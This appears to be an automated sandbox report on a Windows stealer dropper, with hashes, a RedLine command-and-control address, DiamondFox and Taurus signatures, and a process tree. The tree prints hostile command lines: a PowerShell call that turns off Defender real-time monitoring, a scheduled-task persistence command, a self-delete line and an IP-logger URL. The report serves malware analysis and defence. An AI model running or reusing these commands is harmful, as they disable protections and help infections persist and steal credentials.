Analysis
-
max time kernel
148s -
max time network
186s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
07-06-2021 05:41
Static task
static1
Behavioral task
behavioral1
Sample
33815ECF51B4A2F18811FBA9ED999D36.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
33815ECF51B4A2F18811FBA9ED999D36.exe
Resource
win10v20210410
General
-
Target
33815ECF51B4A2F18811FBA9ED999D36.exe
-
Size
2.5MB
-
MD5
33815ecf51b4a2f18811fba9ed999d36
-
SHA1
709cde4326af52f644cf00d260af65bdd0cbf5e1
-
SHA256
2f76ea148491b558111e852ce708f8802896c21c3b18239d14078f313822e301
-
SHA512
d3e1669d4e60d180a9bcd6b87f2c376be69bb7bebf6a73f0503ab65e4770354b71adcfc0688444ccf9a4d57fff32542f29bbcf12bc9686f347fa8ae8eaac82f5
Malware Config
Extracted
redline
002
piporopopo.com:54367
Signatures
-
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral1/memory/1428-163-0x00000000005D0000-0x00000000005E9000-memory.dmp family_redline behavioral1/memory/1428-167-0x00000000009D0000-0x00000000009E7000-memory.dmp family_redline -
Taurus Stealer Payload 1 IoCs
resource yara_rule behavioral1/memory/868-159-0x0000000000400000-0x0000000000646000-memory.dmp family_taurus_stealer -
DiamondFox payload 2 IoCs
Detects DiamondFox payload in file/memory.
resource yara_rule behavioral1/memory/1948-138-0x0000000000400000-0x0000000000641000-memory.dmp diamondfox behavioral1/memory/1236-174-0x0000000000400000-0x0000000000641000-memory.dmp diamondfox -
Executes dropped EXE 15 IoCs
pid Process 1596 Control.dll 1808 curl.dll 1584 autorun.dll 1440 autorun.exe 1756 sistemes.dll 1616 sistemes.exe 1500 laun.dll 1316 laun.exe 828 der.dll 1948 der.exe 968 Tausuus.dll 868 Tausuus.exe 2024 red.dll 1428 red.exe 1236 MicrosoftEdgeCPS.exe -
Loads dropped DLL 34 IoCs
pid Process 564 33815ECF51B4A2F18811FBA9ED999D36.exe 564 33815ECF51B4A2F18811FBA9ED999D36.exe 564 33815ECF51B4A2F18811FBA9ED999D36.exe 1584 autorun.dll 1584 autorun.dll 1584 autorun.dll 1584 autorun.dll 564 33815ECF51B4A2F18811FBA9ED999D36.exe 1756 sistemes.dll 1756 sistemes.dll 1756 sistemes.dll 1756 sistemes.dll 564 33815ECF51B4A2F18811FBA9ED999D36.exe 1500 laun.dll 1500 laun.dll 1500 laun.dll 1500 laun.dll 564 33815ECF51B4A2F18811FBA9ED999D36.exe 828 der.dll 828 der.dll 828 der.dll 828 der.dll 564 33815ECF51B4A2F18811FBA9ED999D36.exe 968 Tausuus.dll 968 Tausuus.dll 968 Tausuus.dll 968 Tausuus.dll 564 33815ECF51B4A2F18811FBA9ED999D36.exe 2024 red.dll 2024 red.dll 2024 red.dll 2024 red.dll 1948 der.exe 1948 der.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Time Manager = "C:\\ProgramData\\TimeManager.exe" Explorer.EXE -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Explorer.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Explorer.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1944 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2628 timeout.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000529101d5c9814b4eb0f580b37542e45000000000020000000000106600000001000020000000273dafebff1f5ade25ec556908192658fa17446b75e147e6328ebea341560f60000000000e800000000200002000000092444f0a442e9c5b14e8096b3ae68e3d64846ac00b37b9e74069bafd29097b4f90000000b3eda59a029ca37b56c4c7e0a70ca4e4eb65e5f153d66885484db459014ffacde62a113e9a57b0b95dbb2d026fe148187c4282fbab01b6c0e3692d38a7eb940d486bdefdbbac1a8737063ef889ace71a482f464d8812e78e5b8530e4f8237d5443e66f893bdd1973888a013e8b9b9ccf98a4e2c5cbbd9e2a3b8a8a5285ef67395809f76f3017b957fc3df1c2016fa28140000000c76f71ba1b0c578195081ee19283a6b18ea310a22ef16fe3708ca6cdad5d820b11eb5c3797d007de88a173a97ff86304dfb1434ef189d25e151199f620ec9d30 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000529101d5c9814b4eb0f580b37542e4500000000002000000000010660000000100002000000022bbc684ce75173a27c41b06a54d771963464a92975e9f2a92d88cd1d263b560000000000e800000000200002000000030a508a82adb1e77fdf16475cc716a7b44a43b87759ada56ddc48b3aa5579c6a200000006afc257ae7c8a7630018d29fc7d451fcd67e43bda6983a7ad2f8494f4196e567400000008636e8565ba89696a5002f7016f76224f42c410a21bdec341da547f17acd8b4c5f0a20679f712eda152ab94171e07b0eac676fbc1dd5f2381de924bc3529a381 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b05edc38705bd701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5927A901-C763-11EB-B1FC-4E51BFDEC7AF} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "329816484" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1316 laun.exe 2120 powershell.exe 2120 powershell.exe 1428 red.exe 1428 red.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1316 laun.exe Token: SeShutdownPrivilege 1200 Explorer.EXE Token: SeShutdownPrivilege 1200 Explorer.EXE Token: SeShutdownPrivilege 1200 Explorer.EXE Token: SeDebugPrivilege 2120 powershell.exe Token: SeDebugPrivilege 1428 red.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1628 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1628 iexplore.exe 1628 iexplore.exe 840 IEXPLORE.EXE 840 IEXPLORE.EXE 840 IEXPLORE.EXE 840 IEXPLORE.EXE -
Suspicious use of UnmapMainImage 7 IoCs
pid Process 1440 autorun.exe 1616 sistemes.exe 1316 laun.exe 1948 der.exe 868 Tausuus.exe 1428 red.exe 1236 MicrosoftEdgeCPS.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 564 wrote to memory of 1628 564 33815ECF51B4A2F18811FBA9ED999D36.exe 29 PID 564 wrote to memory of 1628 564 33815ECF51B4A2F18811FBA9ED999D36.exe 29 PID 564 wrote to memory of 1628 564 33815ECF51B4A2F18811FBA9ED999D36.exe 29 PID 564 wrote to memory of 1628 564 33815ECF51B4A2F18811FBA9ED999D36.exe 29 PID 564 wrote to memory of 1596 564 33815ECF51B4A2F18811FBA9ED999D36.exe 30 PID 564 wrote to memory of 1596 564 33815ECF51B4A2F18811FBA9ED999D36.exe 30 PID 564 wrote to memory of 1596 564 33815ECF51B4A2F18811FBA9ED999D36.exe 30 PID 564 wrote to memory of 1596 564 33815ECF51B4A2F18811FBA9ED999D36.exe 30 PID 1628 wrote to memory of 840 1628 iexplore.exe 32 PID 1628 wrote to memory of 840 1628 iexplore.exe 32 PID 1628 wrote to memory of 840 1628 iexplore.exe 32 PID 1628 wrote to memory of 840 1628 iexplore.exe 32 PID 564 wrote to memory of 1808 564 33815ECF51B4A2F18811FBA9ED999D36.exe 33 PID 564 wrote to memory of 1808 564 33815ECF51B4A2F18811FBA9ED999D36.exe 33 PID 564 wrote to memory of 1808 564 33815ECF51B4A2F18811FBA9ED999D36.exe 33 PID 564 wrote to memory of 1808 564 33815ECF51B4A2F18811FBA9ED999D36.exe 33 PID 564 wrote to memory of 1584 564 33815ECF51B4A2F18811FBA9ED999D36.exe 34 PID 564 wrote to memory of 1584 564 33815ECF51B4A2F18811FBA9ED999D36.exe 34 PID 564 wrote to memory of 1584 564 33815ECF51B4A2F18811FBA9ED999D36.exe 34 PID 564 wrote to memory of 1584 564 33815ECF51B4A2F18811FBA9ED999D36.exe 34 PID 1584 wrote to memory of 1440 1584 autorun.dll 35 PID 1584 wrote to memory of 1440 1584 autorun.dll 35 PID 1584 wrote to memory of 1440 1584 autorun.dll 35 PID 1584 wrote to memory of 1440 1584 autorun.dll 35 PID 1584 wrote to memory of 1440 1584 autorun.dll 35 PID 1584 wrote to memory of 1440 1584 autorun.dll 35 PID 1584 wrote to memory of 1440 1584 autorun.dll 35 PID 564 wrote to memory of 1756 564 33815ECF51B4A2F18811FBA9ED999D36.exe 36 PID 564 wrote to memory of 1756 564 33815ECF51B4A2F18811FBA9ED999D36.exe 36 PID 564 wrote to memory of 1756 564 33815ECF51B4A2F18811FBA9ED999D36.exe 36 PID 564 wrote to memory of 1756 564 33815ECF51B4A2F18811FBA9ED999D36.exe 36 PID 1756 wrote to memory of 1616 1756 sistemes.dll 37 PID 1756 wrote to memory of 1616 1756 sistemes.dll 37 PID 1756 wrote to memory of 1616 1756 sistemes.dll 37 PID 1756 wrote to memory of 1616 1756 sistemes.dll 37 PID 564 wrote to memory of 1500 564 33815ECF51B4A2F18811FBA9ED999D36.exe 38 PID 564 wrote to memory of 1500 564 33815ECF51B4A2F18811FBA9ED999D36.exe 38 PID 564 wrote to memory of 1500 564 33815ECF51B4A2F18811FBA9ED999D36.exe 38 PID 564 wrote to memory of 1500 564 33815ECF51B4A2F18811FBA9ED999D36.exe 38 PID 1616 wrote to memory of 1944 1616 sistemes.exe 39 PID 1616 wrote to memory of 1944 1616 sistemes.exe 39 PID 1616 wrote to memory of 1944 1616 sistemes.exe 39 PID 1616 wrote to memory of 1944 1616 sistemes.exe 39 PID 1500 wrote to memory of 1316 1500 laun.dll 41 PID 1500 wrote to memory of 1316 1500 laun.dll 41 PID 1500 wrote to memory of 1316 1500 laun.dll 41 PID 1500 wrote to memory of 1316 1500 laun.dll 41 PID 564 wrote to memory of 828 564 33815ECF51B4A2F18811FBA9ED999D36.exe 42 PID 564 wrote to memory of 828 564 33815ECF51B4A2F18811FBA9ED999D36.exe 42 PID 564 wrote to memory of 828 564 33815ECF51B4A2F18811FBA9ED999D36.exe 42 PID 564 wrote to memory of 828 564 33815ECF51B4A2F18811FBA9ED999D36.exe 42 PID 1316 wrote to memory of 1200 1316 laun.exe 7 PID 1316 wrote to memory of 1200 1316 laun.exe 7 PID 1316 wrote to memory of 1200 1316 laun.exe 7 PID 1316 wrote to memory of 1200 1316 laun.exe 7 PID 1316 wrote to memory of 1200 1316 laun.exe 7 PID 1316 wrote to memory of 1200 1316 laun.exe 7 PID 1316 wrote to memory of 1200 1316 laun.exe 7 PID 1316 wrote to memory of 1200 1316 laun.exe 7 PID 1316 wrote to memory of 1200 1316 laun.exe 7 PID 1316 wrote to memory of 1200 1316 laun.exe 7 PID 1316 wrote to memory of 1200 1316 laun.exe 7 PID 828 wrote to memory of 1948 828 der.dll 44 PID 828 wrote to memory of 1948 828 der.dll 44
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Adds Run key to start application
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:1200 -
C:\Users\Admin\AppData\Local\Temp\33815ECF51B4A2F18811FBA9ED999D36.exe"C:\Users\Admin\AppData\Local\Temp\33815ECF51B4A2F18811FBA9ED999D36.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.com/2E9wY53⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1628 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:840
-
-
-
C:\Users\Admin\AppData\Roaming\Control.dll"C:\Users\Admin\AppData\Roaming\Control.dll" -s -psfgvedfsbetdfhgbefsdtgretgdhdgersfhbetfsgrsfhasgsdg3⤵
- Executes dropped EXE
PID:1596
-
-
C:\Users\Admin\AppData\Roaming\curl.dll"C:\Users\Admin\AppData\Roaming\curl.dll" -s -pfhnrstya4rfhjnterast24wrhetfygr3⤵
- Executes dropped EXE
PID:1808
-
-
C:\Users\Admin\AppData\Roaming\autorun.dll"C:\Users\Admin\AppData\Roaming\autorun.dll" -s -pfhnrstya4rfhjnterast24wrhetfygr3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Users\Admin\AppData\Roaming\autorun.exe"C:\Users\Admin\AppData\Roaming\autorun.exe"4⤵
- Executes dropped EXE
- Suspicious use of UnmapMainImage
PID:1440
-
-
-
C:\Users\Admin\AppData\Roaming\sistemes.dll"C:\Users\Admin\AppData\Roaming\sistemes.dll" -s -pfhnrstya4rfhjnterast24wrhetfygr3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Users\Admin\AppData\Roaming\sistemes.exe"C:\Users\Admin\AppData\Roaming\sistemes.exe"4⤵
- Executes dropped EXE
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn Windows\MicrosoftVisualStudio /tr "C:\ProgramData\Microsoft Visual Studio\getmac.exe" /st 00:00 /sc once /du 9999:59 /ri 1 /f5⤵
- Creates scheduled task(s)
PID:1944
-
-
-
-
C:\Users\Admin\AppData\Roaming\laun.dll"C:\Users\Admin\AppData\Roaming\laun.dll" -s -pfhnrstya4rfhjnterast24wrhetfygr3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Users\Admin\AppData\Roaming\laun.exe"C:\Users\Admin\AppData\Roaming\laun.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:1316
-
-
-
C:\Users\Admin\AppData\Roaming\der.dll"C:\Users\Admin\AppData\Roaming\der.dll" -s -pfhnrstya4rfhjnterast24wrhetfygr3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:828 -
C:\Users\Admin\AppData\Roaming\der.exe"C:\Users\Admin\AppData\Roaming\der.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of UnmapMainImage
PID:1948 -
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"5⤵
- Executes dropped EXE
- Suspicious use of UnmapMainImage
PID:1236 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 16⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2120
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\Tausuus.dll"C:\Users\Admin\AppData\Roaming\Tausuus.dll" -s -pfhnrstya4rfhjnterast24wrhetfygr3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:968 -
C:\Users\Admin\AppData\Roaming\Tausuus.exe"C:\Users\Admin\AppData\Roaming\Tausuus.exe"4⤵
- Executes dropped EXE
- Suspicious use of UnmapMainImage
PID:868 -
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\Tausuus.exe5⤵PID:2596
-
C:\Windows\SysWOW64\timeout.exetimeout /t 36⤵
- Delays execution with timeout.exe
PID:2628
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\red.dll"C:\Users\Admin\AppData\Roaming\red.dll" -s -pfhnrstya4rfhjnterast24wrhetfygr3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2024 -
C:\Users\Admin\AppData\Roaming\red.exe"C:\Users\Admin\AppData\Roaming\red.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:1428
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {15586C17-690A-4E9A-BAC9-EAFFAE73F82D} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]1⤵PID:2768